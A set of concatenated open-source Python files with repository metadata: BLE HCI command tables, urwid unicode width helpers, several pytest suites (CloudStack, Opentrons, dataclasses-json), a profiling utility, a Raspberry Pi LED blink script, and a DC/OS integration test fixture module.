"GATT_WRITE_RESPONSE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_ALLOW_READ: [
"GATT_ALLOW_READ",
{
"conn_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_SET_SECURITY_PERMISSION: [
"GATT_SET_SECURITY_PERMISSION",
{
"service_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"security_permission": uctypes.UINT8 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_SET_DESC_VAL: [
"GATT_SET_DESC_VAL",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_HANDLE_VALUE: [
"GATT_READ_HANDLE_VALUE",
{
"attr_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0,
"value_len": uctypes.UINT16 | 1,
"value":
(uctypes.ARRAY | 3, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 3)
}
],
OCF_GATT_READ_HANDLE_VALUE_OFFSET: [
"GATT_READ_HANDLE_VALUE_OFFSET",
{
"attr_handle": uctypes.UINT16 | 0,
"offset": uctypes.UINT8 | 2
},
{
"status": uctypes.UINT8 | 0,
"value_len": uctypes.UINT16 | 1,
"value":
(uctypes.ARRAY | 3, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 3)
}
],
OCF_GATT_UPD_CHAR_VAL_EXT: [
"GATT_UPD_CHAR_VAL_EXT",
{
"service_handle": uctypes.UINT16 | 0,
"char_handle": uctypes.UINT16 | 2,
"update_type": uctypes.UINT8 | 4,
"char_length": uctypes.UINT16 | 5,
"value_offset": uctypes.UINT16 | 7,
"value_length": uctypes.UINT8 | 9,
"value":
(uctypes.ARRAY | 10, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 10)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_L2CAP_CONN_PARAM_UPDATE_REQ: [
"L2CAP_CONN_PARAM_UPDATE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"interval_min": uctypes.UINT16 | 2,
"interval_max": uctypes.UINT16 | 4,
"slave_latency": uctypes.UINT16 | 6,
"timeout_multiplier": uctypes.UINT16 | 8
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_L2CAP_CONN_PARAM_UPDATE_RESP: [
"L2CAP_CONN_PARAM_UPDATE_RESP",
{
"IDB05A1": {
"conn_handle": uctypes.UINT16 | 0,
"interval_min": uctypes.UINT16 | 2,
"interval_max": uctypes.UINT16 | 4,
"slave_latency": uctypes.UINT16 | 6,
"timeout_multiplier": uctypes.UINT16 | 8,
"min_ce_length": uctypes.UINT16 | 10,
"max_ce_length": uctypes.UINT16 | 12,
"id": uctypes.UINT8 | 14,
"accept": uctypes.UINT8 | 15
},
"IDB04A1": {
"conn_handle": uctypes.UINT16 | 0,
"interval_min": uctypes.UINT16 | 2,
"interval_max": uctypes.UINT16 | 4,
"slave_latency": uctypes.UINT16 | 6,
"timeout_multiplier": uctypes.UINT16 | 8,
"id": uctypes.UINT8 | 10,
"accept": uctypes.UINT8 | 11
}
},
{
"status": uctypes.UINT8 | 0
}
]
}
]
| dmazzella/uble | bluetooth_low_energy/protocols/hci/vendor_specifics/st_microelectronics/bluenrg_ms/cmd.py | Python | mit | 39,745 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Urwid unicode character processing tables
# Copyright (C) 2004-2011 Ian Ward
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Urwid web site: http://excess.org/urwid/
import re
from urwid.compat import bytes, B, ord2
SAFE_ASCII_RE = re.compile(u"^[ -~]*$")
SAFE_ASCII_BYTES_RE = re.compile(B("^[ -~]*$"))
_byte_encoding = None
# GENERATED DATA
# generated from
# http://www.unicode.org/Public/4.0-Update/EastAsianWidth-4.0.0.txt
widths = [
(126, 1),
(159, 0),
(687, 1),
(710, 0),
(711, 1),
(727, 0),
(733, 1),
(879, 0),
(1154, 1),
(1161, 0),
(4347, 1),
(4447, 2),
(7467, 1),
(7521, 0),
(8369, 1),
(8426, 0),
(9000, 1),
(9002, 2),
(11021, 1),
(12350, 2),
(12351, 1),
(12438, 2),
(12442, 0),
(19893, 2),
(19967, 1),
(55203, 2),
(63743, 1),
(64106, 2),
(65039, 1),
(65059, 0),
(65131, 2),
(65279, 1),
(65376, 2),
(65500, 1),
(65510, 2),
(120831, 1),
(262141, 2),
(1114109, 1),
]
# ACCESSOR FUNCTIONS
def get_width( o ):
"""Return the screen column width for unicode ordinal o."""
global widths
if o == 0xe or o == 0xf:
return 0
for num, wid in widths:
if o <= num:
return wid
return 1
def decode_one( text, pos ):
"""
Return (ordinal at pos, next position) for UTF-8 encoded text.
"""
assert isinstance(text, bytes), text
b1 = ord2(text[pos])
if not b1 & 0x80:
return b1, pos+1
error = ord("?"), pos+1
lt = len(text)
lt = lt-pos
if lt < 2:
return error
if b1 & 0xe0 == 0xc0:
b2 = ord2(text[pos+1])
if b2 & 0xc0 != 0x80:
return error
o = ((b1&0x1f)<<6)|(b2&0x3f)
if o < 0x80:
return error
return o, pos+2
if lt < 3:
return error
if b1 & 0xf0 == 0xe0:
b2 = ord2(text[pos+1])
if b2 & 0xc0 != 0x80:
return error
b3 = ord2(text[pos+2])
if b3 & 0xc0 != 0x80:
return error
o = ((b1&0x0f)<<12)|((b2&0x3f)<<6)|(b3&0x3f)
if o < 0x800:
return error
return o, pos+3
if lt < 4:
return error
if b1 & 0xf8 == 0xf0:
b2 = ord2(text[pos+1])
if b2 & 0xc0 != 0x80:
return error
b3 = ord2(text[pos+2])
if b3 & 0xc0 != 0x80:
return error
b4 = ord2(text[pos+2])
if b4 & 0xc0 != 0x80:
return error
o = ((b1&0x07)<<18)|((b2&0x3f)<<12)|((b3&0x3f)<<6)|(b4&0x3f)
if o < 0x10000:
return error
return o, pos+4
return error
def decode_one_uni(text, i):
"""
decode_one implementation for unicode strings
"""
return ord(text[i]), i+1
def decode_one_right(text, pos):
"""
Return (ordinal at pos, next position) for UTF-8 encoded text.
pos is assumed to be on the trailing byte of a utf-8 sequence.
"""
assert isinstance(text, bytes), text
error = ord("?"), pos-1
p = pos
while p >= 0:
if ord2(text[p])&0xc0 != 0x80:
o, next = decode_one( text, p )
return o, p-1
p -=1
if p == p-4:
return error
def set_byte_encoding(enc):
assert enc in ('utf8', 'narrow', 'wide')
global _byte_encoding
_byte_encoding = enc
def get_byte_encoding():
return _byte_encoding
def calc_text_pos(text, start_offs, end_offs, pref_col):
"""
Calculate the closest position to the screen column pref_col in text
where start_offs is the offset into text assumed to be screen column 0
and end_offs is the end of the range to search.
text may be unicode or a byte string in the target _byte_encoding
Returns (position, actual_col).
"""
assert start_offs <= end_offs, repr((start_offs, end_offs))
utfs = isinstance(text, bytes) and _byte_encoding == "utf8"
unis = not isinstance(text, bytes)
if unis or utfs:
decode = [decode_one, decode_one_uni][unis]
i = start_offs
sc = 0
n = 1 # number to advance by
while i < end_offs:
o, n = decode(text, i)
w = get_width(o)
if w+sc > pref_col:
return i, sc
i = n
sc += w
return i, sc
assert type(text) == bytes, repr(text)
# "wide" and "narrow"
i = start_offs+pref_col
if i >= end_offs:
return end_offs, end_offs-start_offs
if _byte_encoding == "wide":
if within_double_byte(text, start_offs, i) == 2:
i -= 1
return i, i-start_offs
def calc_width(text, start_offs, end_offs):
"""
Return the screen column width of text between start_offs and end_offs.
text may be unicode or a byte string in the target _byte_encoding
Some characters are wide (take two columns) and others affect the
previous character (take zero columns). Use the widths table above
to calculate the screen column width of text[start_offs:end_offs]
"""
assert start_offs <= end_offs, repr((start_offs, end_offs))
utfs = isinstance(text, bytes) and _byte_encoding == "utf8"
unis = not isinstance(text, bytes)
if (unis and not SAFE_ASCII_RE.match(text)
) or (utfs and not SAFE_ASCII_BYTES_RE.match(text)):
decode = [decode_one, decode_one_uni][unis]
i = start_offs
sc = 0
n = 1 # number to advance by
while i < end_offs:
o, n = decode(text, i)
w = get_width(o)
i = n
sc += w
return sc
# "wide", "narrow" or all printable ASCII, just return the character count
return end_offs - start_offs
def is_wide_char(text, offs):
"""
Test if the character at offs within text is wide.
text may be unicode or a byte string in the target _byte_encoding
"""
if isinstance(text, unicode):
o = ord(text[offs])
return get_width(o) == 2
assert isinstance(text, bytes)
if _byte_encoding == "utf8":
o, n = decode_one(text, offs)
return get_width(o) == 2
if _byte_encoding == "wide":
return within_double_byte(text, offs, offs) == 1
return False
def move_prev_char(text, start_offs, end_offs):
"""
Return the position of the character before end_offs.
"""
assert start_offs < end_offs
if isinstance(text, unicode):
return end_offs-1
assert isinstance(text, bytes)
if _byte_encoding == "utf8":
o = end_offs-1
while ord2(text[o])&0xc0 == 0x80:
o -= 1
return o
if _byte_encoding == "wide" and within_double_byte(text,
start_offs, end_offs-1) == 2:
return end_offs-2
return end_offs-1
def move_next_char(text, start_offs, end_offs):
"""
Return the position of the character after start_offs.
"""
assert start_offs < end_offs
if isinstance(text, unicode):
return start_offs+1
assert isinstance(text, bytes)
if _byte_encoding == "utf8":
o = start_offs+1
while o<end_offs and ord2(text[o])&0xc0 == 0x80:
o += 1
return o
if _byte_encoding == "wide" and within_double_byte(text,
start_offs, start_offs) == 1:
return start_offs +2
return start_offs+1
def within_double_byte(text, line_start, pos):
"""Return whether pos is within a double-byte encoded character.
text -- byte string in question
line_start -- offset of beginning of line (< pos)
pos -- offset in question
Return values:
0 -- not within dbe char, or double_byte_encoding == False
1 -- pos is on the 1st half of a dbe char
2 -- pos is on the 2nd half og a dbe char
"""
assert isinstance(text, bytes)
v = ord2(text[pos])
if v >= 0x40 and v < 0x7f:
# might be second half of big5, uhc or gbk encoding
if pos == line_start: return 0
if ord2(text[pos-1]) >= 0x81:
if within_double_byte(text, line_start, pos-1) == 1:
return 2
return 0
if v < 0x80: return 0
i = pos -1
while i >= line_start:
if ord2(text[i]) < 0x80:
break
i -= 1
if (pos - i) & 1:
return 1
return 2
# TABLE GENERATION CODE
def process_east_asian_width():
import sys
out = []
last = None
for line in sys.stdin.readlines():
if line[:1] == "#": continue
line = line.strip()
hex,rest = line.split(";",1)
wid,rest = rest.split(" # ",1)
word1 = rest.split(" ",1)[0]
if "." in hex:
hex = hex.split("..")[1]
num = int(hex, 16)
if word1 in ("COMBINING","MODIFIER","<control>"):
l = 0
elif wid in ("W", "F"):
l = 2
else:
l = 1
if last is None:
out.append((0, l))
last = l
if last == l:
out[-1] = (num, l)
else:
out.append( (num, l) )
last = l
print "widths = ["
for o in out[1:]: # treat control characters same as ascii
print "\t%r," % (o,)
print "]"
if __name__ == "__main__":
process_east_asian_width()
| bk2204/urwid | urwid/old_str_util.py | Python | lgpl-2.1 | 10,013 |
from marvin.cloudstackAPI import *
from marvin.cloudstackTestCase import *
from marvin.lib.base import *
from marvin.lib.common import *
from marvin.lib.utils import *
from nose.plugins.attrib import attr
class TestRegions(cloudstackTestCase):
"""Test Regions - basic region creation
"""
@classmethod
def setUpClass(cls):
testClient = super(TestRegions, cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.services = testClient.getParsedTestDataConfig()
cls.domain = get_domain(cls.apiclient)
cls.cleanup = []
@attr(tags=["basic", "advanced"], required_hardware="true")
def test_createRegion(self):
""" Test for create region
"""
region = Region.create(self.apiclient,
self.services["region"]
)
list_region = Region.list(self.apiclient,
id=self.services["region"]["regionid"]
)
self.assertEqual(
isinstance(list_region, list),
True,
"Check for list Region response"
)
region_response = list_region[0]
self.assertEqual(
str(region_response.id),
self.services["region"]["regionid"],
"listRegion response does not match with region Id created"
)
self.assertEqual(
region_response.name,
self.services["region"]["regionname"],
"listRegion response does not match with region name created"
)
self.assertEqual(
region_response.endpoint,
self.services["region"]["regionendpoint"],
"listRegion response does not match with region endpoint created"
)
self.cleanup.append(region)
return
@classmethod
def tearDownClass(cls):
try:
# Clean up
cleanup_resources(cls.apiclient, cls.cleanup)
list_region = Region.list(cls.apiclient, id=cls.services["region"]["regionid"])
assert list_region is None, "Region deletion fails"
except Exception as e:
raise Exception("Warning: Region cleanup/delete fails with : %s" % e)
| remibergsma/cosmic | cosmic-core/test/integration/smoke/test_regions.py | Python | apache-2.0 | 2,270 |
"""Constants for Stream component."""
DOMAIN = 'stream'
ATTR_ENDPOINTS = 'endpoints'
ATTR_STREAMS = 'streams'
ATTR_KEEPALIVE = 'keepalive'
OUTPUT_FORMATS = ['hls']
FORMAT_CONTENT_TYPE = {
'hls': 'application/vnd.apple.mpegurl'
}
AUDIO_SAMPLE_RATE = 44100
| nugget/home-assistant | homeassistant/components/stream/const.py | Python | apache-2.0 | 263 |
# test super with multiple inheritance
class A:
def foo(self):
print('A.foo')
class B:
def foo(self):
print('B.foo')
class C(A, B):
def foo(self):
print('C.foo')
super().foo()
C().foo()
| infinnovation/micropython | tests/basics/class_super_multinherit.py | Python | mit | 234 |
import pytest
from typing import *
from dataclasses import dataclass
from dataclasses_json import dataclass_json
from marshmallow import ValidationError
# == Common use cases ==
@dataclass_json
@dataclass
class C1:
f1: Union[int, str]
@dataclass_json
@dataclass
class C2:
f1: Union[int, Dict[str, float]]
@dataclass_json
@dataclass
class C3:
f1: Union[int, List[float]]
# == Use cases with nested dataclasses ==
@dataclass_json
@dataclass
class Aux1:
f1: int
@dataclass_json
@dataclass
class Aux2:
f1: str
@dataclass_json
@dataclass
class C4:
f1: Union[Aux1, Aux2]
@dataclass_json
@dataclass
class C5:
f1: Union[Aux1, Aux2, None]
@dataclass_json
@dataclass
class C6:
f1: Union[Aux1, None] # The same as Optional[Aux1]
@dataclass_json
@dataclass
class C7:
f1: Union[C5, C6]
@dataclass_json
@dataclass
class C8:
f1: Dict[str, Union[Aux1, Aux2]]
@dataclass_json
@dataclass
class C9:
f1: List[Union[Aux1, Aux2]]
params = [
(C1(f1=12), {"f1": 12}, '{"f1": 12}'),
(C1(f1="str1"), {"f1": "str1"}, '{"f1": "str1"}'),
(C2(f1=10), {"f1": 10}, '{"f1": 10}'),
(C2(f1={"str1": 0.12}), {"f1": {"str1": 0.12}}, '{"f1": {"str1": 0.12}}'),
(C3(f1=10), {"f1": 10}, '{"f1": 10}'),
(C3(f1=[0.12, 0.13, 0.14]), {"f1": [0.12, 0.13, 0.14]}, '{"f1": [0.12, 0.13, 0.14]}'),
(C4(f1=Aux1(1)), {"f1": {"f1": 1, "__type": "Aux1"}}, '{"f1": {"f1": 1, "__type": "Aux1"}}'),
(C4(f1=Aux2("str1")), {"f1": {"f1": "str1", "__type": "Aux2"}}, '{"f1": {"f1": "str1", "__type": "Aux2"}}'),
(C5(f1=Aux1(1)), {"f1": {"f1": 1, "__type": "Aux1"}}, '{"f1": {"f1": 1, "__type": "Aux1"}}'),
(C5(f1=Aux2("str1")), {"f1": {"f1": "str1", "__type": "Aux2"}}, '{"f1": {"f1": "str1", "__type": "Aux2"}}'),
(C5(f1=None), {"f1": None}, '{"f1": null}'),
(C6(f1=Aux1(1)), {"f1": {"f1": 1}}, '{"f1": {"f1": 1}}'), # For Optionals, type can be clearly defined
(C6(f1=None), {"f1": None}, '{"f1": null}'),
(C7(C5(Aux2("str1"))),
{"f1": {"f1": {"f1": "str1", "__type": "Aux2"}, "__type": "C5"}},
'{"f1": {"f1": {"f1": "str1", "__type": "Aux2"}, "__type": "C5"}}'),
(C7(C6(Aux1(12))),
{"f1": {"f1": {"f1": 12}, "__type": "C6"}},
'{"f1": {"f1": {"f1": 12}, "__type": "C6"}}'),
(C8({"str1": Aux1(12), "str2": Aux2("str3")}),
{"f1": {"str1": {"f1": 12, "__type": "Aux1"}, "str2": {"f1": "str3", "__type": "Aux2"}}},
'{"f1": {"str1": {"f1": 12, "__type": "Aux1"}, "str2": {"f1": "str3", "__type": "Aux2"}}}'),
(C9([Aux1(12), Aux2("str3")]),
{"f1": [{"f1": 12, "__type": "Aux1"}, {"f1": "str3", "__type": "Aux2"}]},
'{"f1": [{"f1": 12, "__type": "Aux1"}, {"f1": "str3", "__type": "Aux2"}]}')
]
@pytest.mark.parametrize('obj, expected, expected_json', params)
def test_serialize(obj, expected, expected_json):
s = obj.schema()
assert s.dump(obj) == expected
assert s.dumps(obj) == expected_json
@pytest.mark.parametrize('expected_obj, data, data_json', params)
def test_deserialize(expected_obj, data, data_json):
cls = type(expected_obj)
s = cls.schema()
assert s.load(data) == expected_obj
assert s.loads(data_json) == expected_obj
def test_deserialize_twice():
data = {"f1": [{"f1": 12, "__type": "Aux1"}, {"f1": "str3", "__type": "Aux2"}]}
expected_obj = C9([Aux1(12), Aux2("str3")])
s = C9.schema()
res1 = s.load(data)
res2 = s.load(data)
assert res1 == expected_obj and res2 == expected_obj
@pytest.mark.parametrize('obj', [
(C2(f1={"str1": "str1"})),
(C3(f1=[0.12, 0.13, "str1"])),
])
def test_serialize_with_error(obj):
s = obj.schema()
with pytest.raises(ValueError):
assert s.dump(obj)
@pytest.mark.parametrize('cls, data', [
(C1, {"f1": None}),
])
def test_deserialize_with_error(cls, data):
s = cls.schema()
with pytest.raises(ValidationError):
assert s.load(data)
| lidatong/dataclasses-json | tests/test_union.py | Python | mit | 3,904 |
# yadt-config-rpm-maker
# Copyright (C) 2011-2013 Immobilien Scout GmbH
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This module contains functions which were created for performance
tweaking. The test coverage of this module is low since it's main
purpose is to add logging information.
"""
from functools import wraps
from logging import getLogger
from time import time
from os import walk
from os.path import join, getsize
from config_rpm_maker.configuration import get_thread_count
LOGGER = getLogger(__name__)
LOG_EACH_MEASUREMENT = False
_execution_time_summary = {}
def measure_execution_time(original_function):
def process_measurement(elapsed_time_in_seconds, args, kwargs):
arguments = ', '.join([str(arg) for arg in args[1:]])
key_word_arguments = ""
if kwargs:
key_word_arguments = ", " + str(kwargs)
if len(args) > 0:
function_name = "%s.%s" % (args[0].__class__.__name__, original_function.__name__)
else:
function_name = original_function.__name__
if function_name not in _execution_time_summary.keys():
_execution_time_summary[function_name] = [elapsed_time_in_seconds, 1]
else:
_execution_time_summary[function_name][0] += elapsed_time_in_seconds
_execution_time_summary[function_name][1] += 1
if LOG_EACH_MEASUREMENT:
function_call = '%s(%s%s)' % (function_name, arguments, key_word_arguments)
LOGGER.debug('Took %.2fs to perform %s', elapsed_time_in_seconds, function_call)
@wraps(original_function)
def wrapped_function(*args, **kwargs):
start_time = time()
return_value_from_function = original_function(*args, **kwargs)
end_time = time()
elapsed_time_in_seconds = end_time - start_time
process_measurement(elapsed_time_in_seconds, args, kwargs)
return return_value_from_function
return wrapped_function
def log_execution_time_summaries(logging_function):
logging_function('Execution times summary (keep in mind thread_count was set to %s):', get_thread_count())
for function_name in sorted(_execution_time_summary.keys()):
summary_of_function = _execution_time_summary[function_name]
elapsed_time = summary_of_function[0]
average_time = summary_of_function[0] / summary_of_function[1]
logging_function(' %5s times with average %5.2fs = sum %7.2fs : %s',
summary_of_function[1], average_time, elapsed_time, function_name)
def log_directories_summary(logging_function, start_path):
directories_summary = {}
directories = walk(start_path).next()[1]
absolute_count_of_files = 0
absolute_total_size = 0
for file_name in walk(start_path).next()[2]:
file_path = join(start_path, file_name)
file_size = getsize(file_path)
absolute_total_size += file_size
absolute_count_of_files += 1
directories_summary[start_path] = (absolute_count_of_files, absolute_total_size)
for directory in directories:
total_size = 0
count_of_files = 0
directory_path = join(start_path, directory)
for dirpath, dirnames, filenames in walk(directory_path):
for file_name in filenames:
file_path = join(dirpath, file_name)
file_size = getsize(file_path)
total_size += file_size
absolute_total_size += file_size
count_of_files += 1
absolute_count_of_files += 1
directories_summary[directory_path] = (count_of_files, total_size)
logging_function('Found %d files in directory "%s" with a total size of %d bytes', absolute_count_of_files, start_path, absolute_total_size)
for directory in sorted(directories_summary.keys()):
count_of_files = directories_summary[directory][0]
total_size = directories_summary[directory][1]
logging_function(' %5d files with total size of %10d bytes in directory "%s"', count_of_files, total_size, directory)
| yadt/yadt-config-rpm-maker | src/config_rpm_maker/utilities/profiler.py | Python | gpl-3.0 | 4,724 |
from pathlib import Path
import pytest
from unittest.mock import MagicMock, patch
from robot_server.service.protocol import errors
from robot_server.service.protocol.manager import ProtocolManager, UploadFile
from robot_server.service.protocol.protocol import UploadedProtocolMeta, \
UploadedProtocol
@pytest.fixture
def mock_upload_file():
m = MagicMock(spec=UploadFile)
m.filename = "some_file_name.py"
return m
@pytest.fixture
def mock_uploaded_protocol(mock_upload_file):
m = MagicMock(spec=UploadedProtocol)
return m
@pytest.fixture
def mock_uploaded_control_constructor(mock_uploaded_protocol):
with patch("robot_server.service.protocol.manager.UploadedProtocol") as p:
def side_effect(protocol_id, protocol_file, support_files):
mock_uploaded_protocol.meta = UploadedProtocolMeta(
identifier=protocol_id,
protocol_file=None,
directory=None)
return mock_uploaded_protocol
p.side_effect = side_effect
yield p
@pytest.fixture
def manager_with_mock_protocol(mock_uploaded_control_constructor,
mock_upload_file):
manager = ProtocolManager()
manager.create(mock_upload_file, [])
return manager
class TestCreate:
def test_create(self, mock_uploaded_control_constructor,
mock_upload_file, mock_uploaded_protocol):
manager = ProtocolManager()
p = manager.create(mock_upload_file, [])
mock_uploaded_control_constructor.assert_called_once_with(
Path(mock_upload_file.filename).stem, mock_upload_file, [])
assert p == mock_uploaded_protocol
assert manager._protocols[mock_uploaded_protocol.meta.identifier] == p
def test_create_already_exists(self,
mock_upload_file,
manager_with_mock_protocol):
with pytest.raises(errors.ProtocolAlreadyExistsException):
manager_with_mock_protocol.create(mock_upload_file, [])
def test_create_upload_limit_reached(self,
mock_upload_file,
manager_with_mock_protocol):
ProtocolManager.MAX_COUNT = 1
m = MagicMock(spec=UploadFile)
m.filename = "123_" + mock_upload_file.filename
with pytest.raises(errors.ProtocolUploadCountLimitReached):
manager_with_mock_protocol.create(m, [])
@pytest.mark.parametrize(argnames="exception", argvalues=[
TypeError, IOError
])
def test_create_raises(self,
exception,
mock_upload_file,
mock_uploaded_protocol):
with patch("robot_server.service.protocol.manager.UploadedProtocol") \
as mock_construct:
def raiser(*args, **kwargs):
raise exception()
mock_construct.side_effect = raiser
with pytest.raises(errors.ProtocolIOException):
manager = ProtocolManager()
manager.create(mock_upload_file, [])
class TestGet:
def test_get(self, manager_with_mock_protocol, mock_uploaded_protocol):
assert manager_with_mock_protocol.get(
mock_uploaded_protocol.meta.identifier
) == mock_uploaded_protocol
def test_not_found(self, manager_with_mock_protocol):
with pytest.raises(errors.ProtocolNotFoundException):
manager_with_mock_protocol.get("___")
class TestGetAll:
def test_get_all(self, manager_with_mock_protocol, mock_uploaded_protocol):
assert list(manager_with_mock_protocol.get_all()) == \
[mock_uploaded_protocol]
def test_get_none(self):
manager = ProtocolManager()
assert list(manager.get_all()) == []
class TestRemove:
def test_remove(self, manager_with_mock_protocol, mock_uploaded_protocol):
manager_with_mock_protocol.remove(
mock_uploaded_protocol.meta.identifier)
assert mock_uploaded_protocol.meta.identifier not in \
manager_with_mock_protocol._protocols
mock_uploaded_protocol.clean_up.assert_called_once()
def test_remove_not_found(self, manager_with_mock_protocol):
with pytest.raises(errors.ProtocolNotFoundException):
manager_with_mock_protocol.remove("___")
class TestRemoveAll:
def test_remove_all(self,
manager_with_mock_protocol,
mock_uploaded_protocol):
manager_with_mock_protocol.remove_all()
mock_uploaded_protocol.clean_up.assert_called_once()
assert manager_with_mock_protocol._protocols == {}
| Opentrons/labware | robot-server/tests/service/protocol/test_manager.py | Python | apache-2.0 | 4,736 |
"""
Sponge Knowledge Base
Blinking LED
Raspberry Pi: Make sure that your Raspberry Pi is not powered! Then connect Grove LED to GPIO via a 4-pin connector:
- BLACK wire goes on PIN#14 (Ground),
- RED wire goes on PIN#02 (DC Power 5V),
- YELLOW wire goes on PIN#12 (GPIO18/GPIO_GEN1),
- WHITE wire goes on PIN#06 (Ground).
"""
from com.pi4j.io.gpio import RaspiPin, PinState
state = False
class LedBlink(Trigger):
def onConfigure(self):
self.withEvent("blink")
def onRun(self, event):
global led, state
state = not state
led.setState(state)
def onStartup():
global led
led = pi.gpio.provisionDigitalOutputPin(RaspiPin.GPIO_01, "led", PinState.LOW)
sponge.event("blink").sendAfter(0, 1000)
def onShutdown():
global led
if led is not None:
led.setState(state)
| softelnet/sponge | sponge-rpi-pi4j/examples/rpi-pi4j/pi4j_led_blink.py | Python | apache-2.0 | 830 |
# -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2018 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""User module errors."""
class DoesNotExistInLDAP(Exception):
"""Account not registered in LDAP exception."""
pass
| tiborsimko/analysis-preservation.cern.ch | cap/modules/user/errors.py | Python | gpl-2.0 | 1,215 |
import collections
import contextlib
import copy
import gzip
import json
import logging
import os
import tempfile
import urllib.parse
import uuid
import zipfile
import boto3
import botocore.exceptions
import bs4
import dns.exception
import dns.resolver
import kazoo.client
import pytest
import requests
import retrying
LOG_LEVEL = logging.INFO
TEST_APP_NAME_FMT = '/integration-test-{}'
MESOS_DNS_ENTRY_UPDATE_TIMEOUT = 60 # in seconds
BASE_ENDPOINT_3DT = '/system/health/v1'
PORT_3DT = 1050
PORT_3DT_AGENT = 61001
# If auth is enabled, by default, tests use hard-coded OAuth token
AUTH_ENABLED = os.getenv('DCOS_AUTH_ENABLED', 'true') == 'true'
# Set these to run test against a custom configured user instead
LOGIN_UNAME = os.getenv('DCOS_LOGIN_UNAME')
LOGIN_PW = os.getenv('DCOS_LOGIN_PW')
@pytest.fixture(scope='module')
def cluster():
assert 'DCOS_DNS_ADDRESS' in os.environ
assert 'MASTER_HOSTS' in os.environ
assert 'PUBLIC_MASTER_HOSTS' in os.environ
assert 'SLAVE_HOSTS' in os.environ
assert 'PUBLIC_SLAVE_HOSTS' in os.environ
assert 'DNS_SEARCH' in os.environ
assert 'DCOS_PROVIDER' in os.environ
# dns_search must be true or false (prevents misspellings)
assert os.environ['DNS_SEARCH'] in ['true', 'false']
assert os.environ['DCOS_PROVIDER'] in ['onprem', 'aws', 'azure']
_setup_logging()
return Cluster(dcos_uri=os.environ['DCOS_DNS_ADDRESS'],
masters=os.environ['MASTER_HOSTS'].split(','),
public_masters=os.environ['PUBLIC_MASTER_HOSTS'].split(','),
slaves=os.environ['SLAVE_HOSTS'].split(','),
public_slaves=os.environ['PUBLIC_SLAVE_HOSTS'].split(','),
registry=os.getenv('REGISTRY_HOST'),
dns_search_set=os.environ['DNS_SEARCH'],
provider=os.environ['DCOS_PROVIDER'])
@pytest.fixture(scope='module')
def auth_cluster(cluster):
if not AUTH_ENABLED:
pytest.skip("Skipped because not running against cluster with auth.")
return cluster
@pytest.fixture(scope='module')
def registry_cluster(cluster, request):
"""Provides a cluster that has a registry deployed via marathon.
Note: cluster nodes must have hard-coded certs from dcos.git installed
"""
if cluster.registry:
return cluster
registry_app = {
"id": "/registry",
"cmd": "docker run -p $PORT0:5000 mesosphere/test_registry:latest",
"cpus": 0.1,
"mem": 128,
"disk": 0,
"instances": 1,
"healthChecks": [{
"protocol": "COMMAND",
"command": {
"value": "curl -sSfv https://registry.marathon.mesos.thisdcos.directory:$PORT0/v2/_catalog"}
}],
"ports": [0],
}
endpoints = cluster.deploy_marathon_app(registry_app)
cluster.registry = 'registry.marathon.mesos.thisdcos.directory:'+str(endpoints[0].port)
docker_cmds = """
#!/bin/bash
docker build -t {registry}/test_server /opt/mesosphere/active/dcos-integration-test/test_server
docker push {registry}/test_server
sleep 36000
""".format(registry=cluster.registry)
docker_build_and_push_app = {
'id': '/build-and-push',
'cmd': docker_cmds,
'cpus': 0.1,
'mem': 64,
'instances': 1,
'healthChecks': [{
'protocol': 'COMMAND',
'command': {'value': 'curl -fsSlv https://{}/v2/test_server/manifests/latest'.format(cluster.registry)},
'gracePeriodSeconds': 400
}]
}
cluster.deploy_marathon_app(docker_build_and_push_app, timeout=500)
def kill_registry():
cluster.destroy_marathon_app(docker_build_and_push_app['id'])
cluster.destroy_marathon_app(registry_app['id'])
request.addfinalizer(kill_registry)
return cluster
def _setup_logging():
"""Setup logging for the script"""
logger = logging.getLogger()
logger.setLevel(LOG_LEVEL)
fmt = logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s')
handler = logging.StreamHandler()
handler.setFormatter(fmt)
logger.addHandler(handler)
